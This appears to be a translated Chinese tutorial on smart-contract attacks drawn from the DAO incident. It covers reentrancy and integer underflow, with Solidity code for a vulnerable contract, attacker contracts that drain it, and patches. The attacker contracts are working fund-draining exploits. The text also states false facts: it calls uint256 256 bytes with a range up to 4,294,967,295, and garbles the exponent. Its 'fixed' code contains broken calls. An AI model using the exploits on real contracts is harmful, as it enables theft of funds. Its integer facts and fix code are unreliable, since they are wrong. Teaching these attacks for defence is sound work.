如果你在數(shù)字貨幣世界待過足夠時(shí)間，也許你聽說過1或2個(gè)智能合約攻擊時(shí)間，這些攻擊導(dǎo)致了幾千萬美元的盜竊損失。最著名的攻擊是DAO事件，這是數(shù)字貨幣世界最受期待的項(xiàng)目之一，同時(shí)也是智能合約的改革。雖然很多人聽說過這些攻擊，但是很少人知道到底發(fā)生了什么，是怎么發(fā)生的，以及如何避免這些錯(cuò)誤。

智能合約是動(dòng)態(tài)的，復(fù)雜的以及難以置信地強(qiáng)大。雖然他們的潛力是很難想象，但是也不可能一夜之間就成為了攻擊的對(duì)象。也就是說，對(duì)于往后的數(shù)字貨幣，我們可以從之前的錯(cuò)誤中學(xué)到經(jīng)驗(yàn)，然后一起成長。雖然DAO是已經(jīng)發(fā)生的事情，但是這對(duì)于開發(fā)者，投資者，以及社區(qū)成員對(duì)于智能合約攻擊來說，都是一個(gè)很好的例子。

今天，我想和大家聊聊從DAO事件中，我們學(xué)到的3件事。

攻擊＃1：重入攻擊

當(dāng)攻擊者通過對(duì)目標(biāo)調(diào)用提款操作的時(shí)候，重入攻擊就會(huì)發(fā)生，就好像DAO事件一樣。當(dāng)合約不能在發(fā)出資金之前更新狀態(tài)（用戶余額），攻擊者就可以連續(xù)進(jìn)行提取函數(shù)調(diào)用，來獲得合約中的資金。任何時(shí)候攻擊者獲得以太幣，他的合約都會(huì)自動(dòng)地調(diào)用反饋函數(shù)，function （），這就再次調(diào)用了提現(xiàn)合約。這時(shí)候，攻擊就會(huì)進(jìn)入遞歸回路，這時(shí)候這個(gè)合約中的資金就會(huì)轉(zhuǎn)入攻擊者。因?yàn)槟繕?biāo)合約都在不停地調(diào)用攻擊者的函數(shù)，這個(gè)合約也不會(huì)更新攻擊者的余額。當(dāng)前的合約不會(huì)發(fā)現(xiàn)有任何問題，更清楚地說，合約函數(shù)中包含反饋函數(shù)，當(dāng)合約收到以太幣和零數(shù)據(jù)的時(shí)候，合約函數(shù)就會(huì)自動(dòng)執(zhí)行。

攻擊流程

1．攻擊者將以太幣存入目標(biāo)函數(shù)

2．目標(biāo)函數(shù)就會(huì)根據(jù)存入的以太幣而更新攻擊者的約

3．攻擊者請(qǐng)求拿回資金

4．資金就會(huì)退回

5．攻擊者的反饋函數(shù)生效，然后調(diào)用提現(xiàn)功能

6．智能合約的邏輯就會(huì)更新攻擊者的余額，因?yàn)樘岈F(xiàn)又被成功調(diào)用

7．資金發(fā)送到攻擊者

8．第5－7步重復(fù)使用

9．一旦攻擊結(jié)束，攻擊者就會(huì)把資金從他們自己的合約發(fā)送到個(gè)人地址

1＊UeDgMZo2n0skHzgkl352zQ

重入攻擊的遞歸回路

很不幸地是，一旦這個(gè)攻擊開始，無法停下。攻擊者的提現(xiàn)功能會(huì)被一次次地調(diào)用，直到合約中的燃料跑完，或者被害者的以太幣余額被消耗光。

代碼

下面就是DAO合約的簡單版本，其中會(huì)包括一些介紹來為這些不熟悉代碼／ solidity語言更好地理解合約。

contract babyDAO ｛

／＊ assign key／value pair so we can look up

credit integers with an ETH address ＊／

mapping （address ＝＞ uint256） public credit；

／＊ a function for funds to be added to the contract，

sender will be credited amount sent ＊／

function donate（address to） payable ｛

credit［msg．sender］ ＋＝ msg．value；

｝

／＊show ether credited to address＊／

function assignedCredit（address） returns （uint） ｛

return credit［msg．sender］；

｝

／＊withdrawal ether from contract＊／

function withdraw（uint amount） ｛

if （credit［msg．sender］ ＞＝ amount） ｛

msg．sender．call．value（amount）（）；

credit［msg．sender］ －＝ amount；

｝

｝

｝

如果我們看下函數(shù)withdraw（），我們可以看到DAO合約使用address．call．value（）來發(fā)送資金到msg．sender。不僅如此，在資金發(fā)出后，合約會(huì)更新credit［msg．sender］的狀態(tài)。攻擊者在發(fā)現(xiàn)了合約代碼中的問題，就能夠使用類似下面的ThisIsAHodlUp ｛｝來將資金轉(zhuǎn)入contract babyDAO｛｝合約。

import ‘browser／babyDAO．sol’；

contract ThisIsAHodlUp ｛

／＊ assign babyDAO contract as ＂dao＂ ＊／

babyDAO public dao ＝ babyDAO（0x2ae．．．）；

address owner；

／＊assign contract creator as owner＊／

constructor（ThisIsAHodlUp） public ｛

owner ＝ msg．sender；

｝

／＊fallback function， withdraws funds from babyDAO＊／

function（） public ｛

dao．withdraw（dao．a(chǎn)ssignedCredit（this））；

｝

／＊send drained funds to attacker’s address＊／

function drainFunds（） payable public｛

owner．transfer（address（this）．balance）；

｝

｝

需要注意地是，這個(gè)后退函數(shù)，function（），會(huì)調(diào)用DAO或者babyDAO｛｝的提現(xiàn)函數(shù)，來從合約中盜取資金。從另個(gè)方面來說，當(dāng)攻擊者想要把所有偷竊來的資金賺到他們的地址，drainFunds（）功能會(huì)被調(diào)用。

解決方案

現(xiàn)在，我們應(yīng)該清楚重放攻擊會(huì)利用兩個(gè)特別的智能合約漏洞。第一個(gè)是當(dāng)合約的狀態(tài)在資金發(fā)出之后，而不是之前進(jìn)行更新。由于在發(fā)出資金前無法更新合約狀態(tài)，函數(shù)就會(huì)在中間計(jì)算的時(shí)候被打斷，合約也認(rèn)為資金其實(shí)還沒有發(fā)出。第二個(gè)漏洞就當(dāng)合約錯(cuò)誤地使用address．call．value（）來發(fā)出資金，而不是address．transfer（） 或者 address．send（）。這兩個(gè)都受限于2300gas，只記錄一個(gè)事件而不是多個(gè)外部調(diào)用。

contract babyDAO｛

．．．．

function withdraw（uint amount） ｛

if （credit［msg．sender］ ＞＝ amount） ｛

credit［msg．sender］ －＝ amount； ／＊ updates balance first ＊／

msg．sender．send（amount）（）； ／＊ send funds properly ＊／

｝

｝

攻擊2：下溢攻擊

雖然DAO合約不會(huì)讓受害者掉入下溢攻擊，我們能夠通過現(xiàn)有的babyDAO contract｛｝來更好地理解這些攻擊為什么會(huì)發(fā)生。

首先，我們需要理解什么是256單位制。一個(gè)256單位制是由256個(gè)字節(jié)組成。以太坊的虛擬機(jī)是使用256字節(jié)來完成的。因?yàn)橐蕴惶摂M機(jī)受限于256字節(jié)的大小，所以數(shù)字的范圍是0到4，294，967，295 （22？？）。如果我們超過這個(gè)范圍，那么數(shù)字就會(huì)重置到范圍的最底部（22？？ ＋ 1 ＝ 0）。如果我們低于這個(gè)范圍，這個(gè)數(shù)字就會(huì)重置到這個(gè)范圍的頂端（0–1＝ 22？？）。

當(dāng)我們從零中減去大于零的數(shù)，就會(huì)發(fā)生下溢攻擊，導(dǎo)致一個(gè)新的22？？數(shù)集?，F(xiàn)在，如果攻擊者的余額發(fā)生了下溢，那么這部分余額就會(huì)更新，從而導(dǎo)致整個(gè)資金被盜。

攻擊流程

攻擊者通過發(fā)出1Wei到目標(biāo)合約，來啟動(dòng)攻擊。

合約認(rèn)證發(fā)出資金的人

隨后調(diào)用1Wei的提現(xiàn)函數(shù)

合約會(huì)從發(fā)送者的賬戶扣除的1Wei，現(xiàn)在賬戶余額又是零

因?yàn)槟繕?biāo)合約將以太幣發(fā)給攻擊者，攻擊者的退回函數(shù)被處罰，所以提現(xiàn)函數(shù)又被調(diào)用。

提現(xiàn)1Wei的事件被記錄

攻擊者合約的余額就會(huì)更新兩次，第一次是到零，第二次是到－1。

攻擊者的余額回置到22？？

攻擊者通過提現(xiàn)目標(biāo)合約的所有資金，從而完成整個(gè)攻擊

代碼

／＊donate 1 wei， withdraw 1 wei＊／

function attack（） ｛

dao．donate．value（1）（this）；

dao．withdraw（1）；

｝

／＊fallback function， results in 0–1 ＝ 2＊＊256 ＊／

function（） ｛

if （performAttack） ｛

performAttack ＝ false；

dao．withdraw（1）；

｝

｝

／＊extract balance from smart contract＊／

function getJackpot（） ｛

dao．withdraw（dao．balance）；

owner．send（this．balance）；

｝

｝

解決方案

為了防止受害人陷入下溢攻擊，最好的方法是看更新的狀態(tài)是否在字節(jié)范圍內(nèi)。我們可以添加參數(shù)來檢查我們的代碼，作為最后一層保護(hù)。函數(shù)withdraw（）的首行代碼是為了檢查是否有足夠的資金，第二行是為了檢查超溢，第三個(gè)是檢查下溢。

contract babysDAO｛

．．．．

／＊withdrawal ether from contract＊／

function withdraw（uint amount） ｛

if （credit［msg．sender］ ＞＝ amount

＆＆ credit［msg．sender］ ＋ amount ＞＝ credit［msg．sender］

＆＆ credit［msg．sender］ － amount ＜＝ credit［msg．sender］） ｛

credit［msg．sender］ －＝ amount；

msg．sender．send（amount）（）；

｝

｝

需要注意，就像我們之前討論，我們上面的代碼是在發(fā)出資金之前更新用戶的余額。